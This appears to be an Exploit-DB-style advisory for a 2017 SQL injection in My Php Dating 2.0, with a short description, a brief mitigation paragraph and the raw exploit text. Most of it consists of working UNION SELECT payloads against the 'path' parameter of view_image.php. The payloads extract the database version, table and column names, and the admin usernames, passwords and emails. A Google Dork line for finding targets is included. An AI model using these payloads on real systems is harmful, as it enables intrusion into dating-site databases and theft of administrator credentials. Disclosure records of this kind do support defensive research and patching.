My Php Dating 2.0 - SQL Injection Web Vulnerability

vendor:

My Php Dating

by:

Ihsan Sencan

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: My Php Dating

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phponlinedatingsoftware:my_php_dating:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2017

My Php Dating 2.0 – SQL Injection Web Vulnerability

My Php Dating 2.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by sending a crafted URL to the application. For example, http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9 can be used to extract the version of the database. Similarly, http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master-- can be used to extract the admin credentials. http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()-- can be used to extract the column names and http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()-- can be used to extract the table names.

Mitigation:

Input validation should be done to prevent SQL Injection attacks. All user input should be validated and filtered before being used in SQL queries. Parameterized queries should be used to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# # # # # 
# Vulnerability: My Php Dating 2.0 - SQL Injection Web Vulnerability
# Google Dork: My Php Dating
# Date:09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Script Name: My Php Dating
# Script Version: 2.0
# Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# SQL Injection/Exploit :
# http://localhost/[PATH]/view_image.php?path=[SQL]
# # # # # 


--------------------------------------------------
Note:

Rate: 0/10 [Rate Picture] <<<Link
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9
Version: javascript:%20ajax_rate_pic(5.5.52-cll,1,1)
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master--

--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()--

--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--